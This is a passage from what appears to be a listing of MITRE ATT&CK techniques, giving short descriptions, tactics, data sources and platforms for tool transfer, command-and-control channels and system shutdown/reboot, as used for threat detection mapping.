Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre